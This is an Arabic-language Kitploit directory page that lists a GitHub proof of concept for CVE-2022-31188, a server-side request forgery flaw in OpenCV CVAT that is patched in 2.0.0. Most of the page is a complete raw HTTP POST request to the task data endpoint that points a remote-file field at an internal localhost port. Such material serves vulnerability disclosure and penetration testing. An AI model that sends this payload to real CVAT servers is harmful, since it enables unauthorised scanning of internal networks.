Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-31188 — إثبات مفهوم لاستغلال CVE-2022-31188، وهي ثغرة تزوير طلبات من جانب الخادم (SSRF) في OpenCV CVAT تسمح للمستخدمين المصادق عليهم الذين لديهم صلاحيات إنشاء المهام (Task Create) بفحص منافذ الشبكة الداخلية. | Kitploit
أدوات/GitHubGitHub/emirpolatt/cve-2022-31188
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubemirpolatt/cve-2022-31188

CVE-2022-31188

إثبات مفهوم لاستغلال CVE-2022-31188، وهي ثغرة تزوير طلبات من جانب الخادم (SSRF) في OpenCV CVAT تسمح للمستخدمين المصادق عليهم الذين لديهم صلاحيات إنشاء المهام (Task Create) بفحص منافذ الشبكة الداخلية.

عرض المستودع
542منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-31188

CVE-2022-31188 - OpenCV CVAT (أداة التعليق التوضيحي للرؤية الحاسوبية) SSRF

CVAT هي أداة مفتوحة المصدر للتعليق التوضيحي للرؤية الحاسوبية، طورتها إنتل. يمكن لأي مستخدم لديه إذن "Task Create" استغلال ثغرة SSRF بإرسال طلب HTTP خبيث والحصول على وصول إلى منافذ أخرى مفتوحة على النظام.

تم إصلاح الثغرة في تحديث 2.0.0 من CVAT.

root@kitploit:~
POST /api/v1/tasks/2/data HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: application/json, text/plain, */*
Accept-Language:en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Token 06d88f739a10c7533991d8010761df721b790b7
X-CSRFTOKEN:65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGV
Content-Type: multipart/form-data; boundary=-----------------------------251652214142138553464236533436
Content-Length: 569
Origin: http://localhost:8080
Connection: close
Referer:http://localhost:8080/tasks/create
Cookie: csrftoken=65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGv; sessionid=dzks19fhlfan8fgq0j8j5toyrh49dned
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name="remote files[0]"

http://localhost:8081
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name=" image quality"

170
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name="use zip chunks"

true
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name="use cache"

true
-----------------------------251652214142138553464236533436--

المراجع

  • https://nvd.nist.gov/vuln/detail/CVE-2022-31188
  • https://github.com/opencv/cvat/security/advisories/GHSA-69qq-p6vh-xjqj

المؤلف: Emir Polat

تويتر: https://twitter.com/devilsgrins

تنزيل الأداة